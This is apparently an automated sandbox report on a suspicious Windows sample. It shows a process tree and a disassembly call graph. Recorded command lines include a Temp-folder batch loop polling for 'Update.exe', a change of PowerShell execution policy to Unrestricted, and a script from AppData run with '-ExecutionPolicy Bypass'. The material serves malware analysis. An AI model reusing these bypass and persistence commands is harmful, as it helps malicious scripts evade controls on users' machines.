                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:08:48:47
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                                              Imagebase:0x110000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:10
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                              Imagebase:0x10000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /I "Update.exe"
                                                                                              Imagebase:0x7a0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:timeout /t 30 /nobreak
                                                                                              Imagebase:0x5f0000
                                                                                              File size:25'088 bytes
                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                              Imagebase:0x130000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:18
                                                                                              Start time:08:48:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                              Imagebase:0x130000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:20
                                                                                              Start time:08:49:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                              Imagebase:0x10000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:08:49:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /I "Update.exe"
                                                                                              Imagebase:0x7a0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:22
                                                                                              Start time:08:49:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:timeout /t 30 /nobreak
                                                                                              Imagebase:0x5f0000
                                                                                              File size:25'088 bytes
                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:23
                                                                                              Start time:08:49:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                              Imagebase:0x10000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:24
                                                                                              Start time:08:49:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /I "Update.exe"
                                                                                              Imagebase:0x7a0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:25
                                                                                              Start time:08:49:48
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:timeout /t 30 /nobreak
                                                                                              Imagebase:0x5f0000
                                                                                              File size:25'088 bytes
                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:26
                                                                                              Start time:08:50:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                              Imagebase:0x10000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:08:50:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /I "Update.exe"
                                                                                              Imagebase:0x7a0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:08:50:18
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:timeout /t 30 /nobreak
                                                                                              Imagebase:0x5f0000
                                                                                              File size:25'088 bytes
                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:18%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:26.8%
                                                                                                Total number of Nodes:1423
                                                                                                Total number of Limit Nodes:15
                                                                                                execution_graph 9093 410e7f 9094 410e9a 9093->9094 9095 410eb5 9094->9095 9097 40f42d 9094->9097 9098 40f445 free 9097->9098 9099 40f437 9097->9099 9100 4024e7 46 API calls 9098->9100 9099->9098 9101 40f456 9099->9101 9100->9101 9101->9095 9089 40e63c 9090 40e5d3 6 API calls 9089->9090 9091 40e644 9090->9091 8241 4024c4 8242 40245a 45 API calls 8241->8242 8243 4024cd 8242->8243 8244 4024d2 8243->8244 8245 4024d3 VirtualAlloc 8243->8245 8246 4096c7 _EH_prolog 8260 4096fa 8246->8260 8247 40971c 8248 409827 8281 40118a 8248->8281 8250 409851 8255 40985e ??2@YAPAXI 8250->8255 8251 40983c 8332 409425 8251->8332 8252 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8252->8260 8254 40969d 8 API calls 8254->8260 8256 409878 8255->8256 8261 409925 ??2@YAPAXI 8256->8261 8262 4098c2 8256->8262 8266 409530 3 API calls 8256->8266 8268 409425 ctype 3 API calls 8256->8268 8270 4099a2 8256->8270 8275 409a65 8256->8275 8291 409fb4 8256->8291 8295 408ea4 8256->8295 8338 409c13 ??2@YAPAXI 8256->8338 8340 409f49 8256->8340 8258 40e959 VirtualFree ??3@YAXPAX free free ctype 8258->8260 8260->8247 8260->8248 8260->8252 8260->8254 8260->8258 8325 4095b7 8260->8325 8329 409403 8260->8329 8261->8256 8335 409530 8262->8335 8266->8256 8268->8256 8271 409530 3 API calls 8270->8271 8272 4099c7 8271->8272 8273 409425 ctype 3 API calls 8272->8273 8273->8247 8277 409530 3 API calls 8275->8277 8278 409a84 8277->8278 8279 409425 ctype 3 API calls 8278->8279 8279->8247 8282 401198 GetDiskFreeSpaceExW 8281->8282 8283 4011ee SendMessageW 8281->8283 8282->8283 8284 4011b0 8282->8284 8289 4011d6 8283->8289 8284->8283 8285 401f9d 19 API calls 8284->8285 8286 4011c9 8285->8286 8287 407717 25 API calls 8286->8287 8288 4011cf 8287->8288 8288->8289 8290 4011e7 8288->8290 8289->8250 8289->8251 8290->8283 8292 409fdd 8291->8292 8344 409dff 8292->8344 8618 40aef3 8295->8618 8298 408ec1 8298->8256 8300 408fd5 8636 408b7c 8300->8636 8301 408f0d ??2@YAPAXI 8310 408ef5 8301->8310 8303 408f31 ??2@YAPAXI 8303->8310 8310->8300 8310->8301 8310->8303 8681 40cdb8 ??2@YAPAXI 8310->8681 8326 4095c6 8325->8326 8328 4095cc 8325->8328 8326->8260 8327 4095e2 _CxxThrowException 8327->8326 8328->8326 8328->8327 8330 40e8e2 4 API calls 8329->8330 8331 40940b 8330->8331 8331->8260 8333 40e8da ctype 3 API calls 8332->8333 8334 409433 8333->8334 8336 408963 ctype 3 API calls 8335->8336 8337 40953b 8336->8337 8339 409c45 8338->8339 8339->8256 8341 409f4e 8340->8341 8342 409f75 8341->8342 8343 409cde 110 API calls 8341->8343 8342->8256 8343->8341 8346 409e04 8344->8346 8345 409e3a 8345->8256 8346->8345 8348 409cde 8346->8348 8349 409cf8 8348->8349 8353 40db1f 8349->8353 8356 401626 8349->8356 8350 409d2c 8350->8346 8419 40da56 8353->8419 8357 401642 8356->8357 8363 401638 8356->8363 8427 40a62f _EH_prolog 8357->8427 8359 40166f 8495 40eca9 8359->8495 8360 401411 2 API calls 8362 401688 8360->8362 8364 401962 ??3@YAXPAX 8362->8364 8365 40169d 8362->8365 8363->8350 8369 40eca9 VariantClear 8364->8369 8453 401329 8365->8453 8368 4016a8 8457 401454 8368->8457 8369->8363 8372 401362 2 API calls 8373 4016c7 ??3@YAXPAX 8372->8373 8378 4016d9 8373->8378 8405 401928 ??3@YAXPAX 8373->8405 8375 40eca9 VariantClear 8375->8363 8376 4016fa 8377 40eca9 VariantClear 8376->8377 8379 401702 ??3@YAXPAX 8377->8379 8378->8376 8380 401764 8378->8380 8393 401725 8378->8393 8379->8359 8382 4017a2 8380->8382 8383 401789 8380->8383 8381 40eca9 VariantClear 8384 401737 ??3@YAXPAX 8381->8384 8386 4017c4 GetLocalTime SystemTimeToFileTime 8382->8386 8387 4017aa 8382->8387 8385 40eca9 VariantClear 8383->8385 8384->8359 8388 401791 ??3@YAXPAX 8385->8388 8386->8387 8389 4017e1 8387->8389 8390 4017f8 8387->8390 8387->8393 8388->8359 8462 403354 lstrlenW 8389->8462 8486 40301a GetFileAttributesW 8390->8486 8393->8381 8395 401934 GetLastError 8395->8405 8396 401818 ??2@YAPAXI 8398 401824 8396->8398 8397 40192a 8397->8395 8499 40db53 8398->8499 8401 40190f 8404 40eca9 VariantClear 8401->8404 8402 40185f GetLastError 8502 4012f7 8402->8502 8404->8405 8405->8375 8406 401871 8407 403354 86 API calls 8406->8407 8411 40187f ??3@YAXPAX 8406->8411 8409 4018cc 8407->8409 8409->8411 8412 40db53 2 API calls 8409->8412 8410 40189c 8413 40eca9 VariantClear 8410->8413 8411->8410 8414 4018f1 8412->8414 8415 4018aa ??3@YAXPAX 8413->8415 8416 4018f5 GetLastError 8414->8416 8417 401906 ??3@YAXPAX 8414->8417 8415->8359 8416->8411 8417->8401 8424 40d985 8419->8424 8422 40da65 CreateFileW 8423 40da8a 8422->8423 8423->8350 8425 40d98f CloseHandle 8424->8425 8426 40d99a 8424->8426 8425->8426 8426->8422 8426->8423 8428 40a738 8427->8428 8429 40a66a 8427->8429 8430 40a687 8428->8430 8431 40a73d 8428->8431 8429->8430 8432 40a704 8429->8432 8433 40a679 8429->8433 8440 40a6ad 8430->8440 8531 40a3b0 8430->8531 8434 40a6f2 8431->8434 8437 40a747 8431->8437 8438 40a699 8431->8438 8432->8440 8505 40e69c 8432->8505 8433->8434 8435 40a67e 8433->8435 8527 40ed34 8434->8527 8439 40a6b2 8435->8439 8444 40a684 8435->8444 8437->8434 8437->8439 8438->8440 8519 40ed59 8438->8519 8439->8440 8523 40ed79 8439->8523 8514 40ecae 8440->8514 8443 40a71a 8508 40eced 8443->8508 8444->8430 8444->8438 8450 40eca9 VariantClear 8452 40166b 8450->8452 8452->8359 8452->8360 8454 401340 8453->8454 8455 40112b 2 API calls 8454->8455 8456 40134b 8455->8456 8456->8368 8458 4012f7 2 API calls 8457->8458 8459 401462 8458->8459 8546 4013e2 8459->8546 8461 40146d 8461->8372 8463 4024fc 2 API calls 8462->8463 8464 403375 8463->8464 8465 40112b 2 API calls 8464->8465 8468 403385 8464->8468 8465->8468 8467 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8469 4033e8 8467->8469 8470 4033f2 8467->8470 8468->8467 8476 403477 8468->8476 8549 401986 CreateDirectoryW 8468->8549 8471 40301a 22 API calls 8469->8471 8472 401986 4 API calls 8470->8472 8483 4033f8 ??3@YAXPAX 8470->8483 8471->8470 8485 403405 8472->8485 8473 4034a7 8474 407776 55 API calls 8473->8474 8479 4034b1 ??3@YAXPAX 8474->8479 8475 40340a 8555 407776 8475->8555 8476->8473 8476->8483 8477 40346b ??3@YAXPAX 8482 4034bc 8477->8482 8478 40341d memcpy 8478->8485 8479->8482 8482->8393 8483->8482 8484 401986 4 API calls 8484->8485 8485->8475 8485->8477 8485->8478 8485->8484 8487 403037 8486->8487 8493 401804 8486->8493 8488 403048 8487->8488 8489 40303b SetLastError 8487->8489 8490 403051 8488->8490 8492 40305f FindFirstFileW 8488->8492 8488->8493 8489->8493 8574 402fed 8490->8574 8492->8490 8494 403072 FindClose CompareFileTime 8492->8494 8493->8395 8493->8396 8493->8397 8494->8490 8494->8493 8496 40ec65 8495->8496 8497 40ec86 VariantClear 8496->8497 8498 40ec9d 8496->8498 8497->8363 8498->8363 8615 40db3c 8499->8615 8503 40112b 2 API calls 8502->8503 8504 401311 8503->8504 8504->8406 8506 4012f7 2 API calls 8505->8506 8507 40e6a9 8506->8507 8507->8443 8535 40ecd7 8508->8535 8511 40ed12 8512 40a726 ??3@YAXPAX 8511->8512 8513 40ed17 _CxxThrowException 8511->8513 8512->8440 8513->8512 8538 40ec65 8514->8538 8516 40ecba 8517 40a7b2 8516->8517 8518 40ecbe memcpy 8516->8518 8517->8450 8518->8517 8520 40ed62 8519->8520 8521 40ed67 8519->8521 8522 40ecd7 VariantClear 8520->8522 8521->8440 8522->8521 8524 40ed82 8523->8524 8525 40ed87 8523->8525 8526 40ecd7 VariantClear 8524->8526 8525->8440 8526->8525 8528 40ed42 8527->8528 8529 40ed3d 8527->8529 8528->8440 8530 40ecd7 VariantClear 8529->8530 8530->8528 8532 40a3c2 8531->8532 8533 40a3de 8532->8533 8542 40eda0 8532->8542 8533->8440 8536 40eca9 VariantClear 8535->8536 8537 40ecdf SysAllocString 8536->8537 8537->8511 8537->8512 8539 40ec6d 8538->8539 8540 40ec86 VariantClear 8539->8540 8541 40ec9d 8539->8541 8540->8516 8541->8516 8543 40edae 8542->8543 8544 40eda9 8542->8544 8543->8533 8545 40ecd7 VariantClear 8544->8545 8545->8543 8547 401398 2 API calls 8546->8547 8548 4013f2 8547->8548 8548->8461 8550 4019c7 8549->8550 8551 401997 GetLastError 8549->8551 8550->8468 8552 4019b1 GetFileAttributesW 8551->8552 8554 4019a6 8551->8554 8552->8550 8552->8554 8553 4019a7 SetLastError 8553->8468 8554->8550 8554->8553 8556 401f9d 19 API calls 8555->8556 8557 40778a wvsprintfW 8556->8557 8558 407859 8557->8558 8559 4077ab GetLastError FormatMessageW 8557->8559 8562 4076a8 25 API calls 8558->8562 8560 4077d9 FormatMessageW 8559->8560 8561 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8559->8561 8560->8558 8560->8561 8566 4076a8 8561->8566 8564 407865 8562->8564 8564->8483 8567 407715 ??3@YAXPAX LocalFree 8566->8567 8568 4076b7 8566->8568 8567->8564 8569 40661a 2 API calls 8568->8569 8570 4076c6 IsWindow 8569->8570 8571 4076ef 8570->8571 8572 4076dd IsBadReadPtr 8570->8572 8573 4073d1 21 API calls 8571->8573 8572->8571 8573->8567 8580 402c86 8574->8580 8576 402ff6 8577 403017 8576->8577 8578 402ffb GetLastError 8576->8578 8577->8493 8579 403006 8578->8579 8579->8493 8581 402c93 GetFileAttributesW 8580->8581 8582 402c8f 8580->8582 8583 402ca4 8581->8583 8584 402ca9 8581->8584 8582->8576 8583->8576 8585 402cc7 8584->8585 8586 402cad SetFileAttributesW 8584->8586 8591 402b79 8585->8591 8588 402cc3 8586->8588 8589 402cba DeleteFileW 8586->8589 8588->8576 8589->8576 8592 4024fc 2 API calls 8591->8592 8593 402b90 8592->8593 8594 40254d 2 API calls 8593->8594 8595 402b9d FindFirstFileW 8594->8595 8596 402c55 SetFileAttributesW 8595->8596 8609 402bbf 8595->8609 8598 402c60 RemoveDirectoryW 8596->8598 8599 402c78 ??3@YAXPAX 8596->8599 8597 401329 2 API calls 8597->8609 8598->8599 8600 402c6d ??3@YAXPAX 8598->8600 8601 402c80 8599->8601 8600->8601 8601->8576 8603 40254d 2 API calls 8603->8609 8604 402c24 SetFileAttributesW 8604->8599 8606 402c2d DeleteFileW 8604->8606 8605 402bef lstrcmpW 8607 402c05 lstrcmpW 8605->8607 8608 402c38 FindNextFileW 8605->8608 8606->8609 8607->8608 8607->8609 8608->8609 8610 402c4e FindClose 8608->8610 8609->8597 8609->8599 8609->8603 8609->8604 8609->8605 8609->8608 8611 402b79 2 API calls 8609->8611 8612 401429 8609->8612 8610->8596 8611->8609 8613 401398 2 API calls 8612->8613 8614 401433 8613->8614 8614->8609 8616 40db1f 2 API calls 8615->8616 8617 401857 8616->8617 8617->8401 8617->8402 8619 40af0c 8618->8619 8634 408ebd 8618->8634 8619->8634 8711 40ac7a 8619->8711 8621 40af3f 8622 40ac7a 7 API calls 8621->8622 8623 40b0cb 8621->8623 8627 40af96 8622->8627 8625 40e959 ctype 4 API calls 8623->8625 8624 40afbd 8718 40e959 8624->8718 8625->8634 8627->8623 8627->8624 8628 40b043 8631 40e959 ctype 4 API calls 8628->8631 8629 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8630 40afc6 8629->8630 8630->8628 8630->8629 8632 40b07f 8631->8632 8633 40e959 ctype 4 API calls 8632->8633 8633->8634 8634->8298 8635 4065ea InitializeCriticalSection 8634->8635 8635->8310 8730 4086f0 8636->8730 8682 40cdc7 8681->8682 8683 408761 4 API calls 8682->8683 8684 40cdde 8683->8684 8684->8310 8712 40e8da ctype 3 API calls 8711->8712 8713 40ac86 8712->8713 8722 40e811 8713->8722 8715 40aca2 8715->8621 8716 409403 4 API calls 8717 40ac90 8716->8717 8717->8715 8717->8716 8719 40e93b 8718->8719 8720 40e8da ctype 3 API calls 8719->8720 8721 40e943 ??3@YAXPAX 8720->8721 8721->8630 8723 40e8a5 8722->8723 8724 40e824 8722->8724 8723->8717 8725 40e833 _CxxThrowException 8724->8725 8726 40e863 ??2@YAPAXI 8724->8726 8727 40e895 ??3@YAXPAX 8724->8727 8725->8724 8726->8724 8728 40e879 memcpy 8726->8728 8727->8723 8728->8727 8731 40e8da ctype 3 API calls 8730->8731 8732 4086f8 8731->8732 8733 40e8da ctype 3 API calls 8732->8733 8734 408700 8733->8734 8735 40e8da ctype 3 API calls 8734->8735 8736 408708 8735->8736 9102 40dace 9105 40daac 9102->9105 9108 40da8f 9105->9108 9109 40da56 2 API calls 9108->9109 9110 40daa9 9109->9110 9092 40dadc ReadFile 9111 411def __set_app_type __p__fmode __p__commode 9112 411e5e 9111->9112 9113 411e72 9112->9113 9114 411e66 __setusermatherr 9112->9114 9123 411f66 _controlfp 9113->9123 9114->9113 9116 411e77 _initterm __getmainargs _initterm 9117 411ecb GetStartupInfoA 9116->9117 9119 411eff GetModuleHandleA 9117->9119 9124 4064af _EH_prolog 9119->9124 9123->9116 9127 404faa 9124->9127 9432 401b37 GetModuleHandleW CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9149 40509b _wtol 9151 4050b1 9149->9151 9150 4050d6 9152 403d71 6 API calls 9150->9152 9463 404405 9151->9463 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9620 404996 9154->9620 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9161 407776 55 API calls 9160->9161 9170 4050ec 9161->9170 9162 4050ee ??3@YAXPAX 9638 403e70 9162->9638 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9178 405173 9165->9178 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9173 4052f2 9169->9173 9170->9162 9171 4051fa 9171->9170 9172 40522a 9171->9172 9175 405213 _wtol 9171->9175 9176 403d71 6 API calls 9172->9176 9174 40538d ??2@YAPAXI 9173->9174 9177 401329 2 API calls 9173->9177 9184 405399 9174->9184 9175->9172 9182 405289 9176->9182 9179 405327 9177->9179 9178->9166 9178->9170 9178->9171 9178->9172 9181 401429 2 API calls 9178->9181 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9178 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9196 4053f6 9194->9196 9197 40536e 9195->9197 9198 4025ae 2 API calls 9196->9198 9199 40254d 2 API calls 9197->9199 9201 4053fe 9198->9201 9200 405377 9199->9200 9200->9174 9491 404e3f 9201->9491 9206 40546f 9207 405534 9206->9207 9210 403d71 6 API calls 9206->9210 9209 40e8da ctype 3 API calls 9207->9209 9208 402844 10 API calls 9211 405441 9208->9211 9212 40553c 9209->9212 9213 405493 9210->9213 9211->9206 9214 407776 55 API calls 9211->9214 9215 405573 9212->9215 9669 403093 9212->9669 9213->9207 9224 40549d 9213->9224 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9162 9218->9170 9222 405588 wsprintfW 9219->9222 9223 4055ed 9219->9223 9230 401411 2 API calls 9219->9230 9232 401329 ??2@YAPAXI ??3@YAXPAX 9219->9232 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9221->9225 9226 401411 2 API calls 9222->9226 9519 404603 9223->9519 9224->9218 9643 404cbc 9224->9643 9225->9218 9226->9219 9229 4054cc 9229->9218 9231 407776 55 API calls 9229->9231 9230->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9231->9233 9232->9219 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9581 404034 9240->9581 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9251 40243b lstrcmpW 9245->9251 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9250 405969 9249->9250 9252 405979 9250->9252 9255 401f9d 19 API calls 9250->9255 9253 4059fe 9251->9253 9736 403b40 9252->9736 9256 405a12 9253->9256 9259 401329 2 API calls 9253->9259 9254 401411 ??2@YAPAXI ??3@YAXPAX 9254->9268 9255->9252 9587 403b59 9256->9587 9258 401362 2 API calls 9258->9268 9259->9256 9263 4073d1 21 API calls 9267 40599c ctype 9263->9267 9264 401329 2 API calls 9264->9268 9265 4055f6 9265->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9265->9275 9279 4057dd _wtol 9265->9279 9294 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9265->9294 9710 40484d 9265->9710 9721 40408b 9265->9721 9266 405a4d 9272 405a2b ??3@YAXPAX ??3@YAXPAX 